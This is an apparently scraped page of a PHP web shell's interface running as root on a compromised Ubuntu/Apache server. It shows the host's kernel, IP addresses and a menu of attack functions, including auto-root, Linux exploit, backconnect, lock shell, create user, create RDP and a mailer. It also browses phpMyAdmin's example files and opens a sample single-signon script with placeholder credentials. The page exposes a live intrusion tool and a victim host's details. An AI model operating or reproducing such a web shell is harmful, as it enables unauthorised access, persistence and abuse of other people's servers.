Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
phpmyadmin /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
config.manyhosts.inc.php
1.57
KB
-rw-r--r--
config.sample.inc.php.gz
1.66
KB
-rw-r--r--
create_tables.sql
10.68
KB
-rw-r--r--
openid.php.gz
1.82
KB
-rw-r--r--
signon-script.php
801
B
-rw-r--r--
signon.php
2.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signon-script.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Single signon for phpMyAdmin * * This is just example how to use script based single signon with * phpMyAdmin, it is not intended to be perfect code and look, only * shows how you can integrate this functionality in your application. * * @package PhpMyAdmin * @subpackage Example */ /** * This function returns username and password. * * It can optionally use configured username as parameter. * * @param string $user User name * * @return array */ function get_login_credentials($user) { /* Optionally we can use passed username */ if (!empty($user)) { return array($user, 'password'); } /* Here we would retrieve the credentials */ $credentials = array('root', ''); return $credentials; }
Close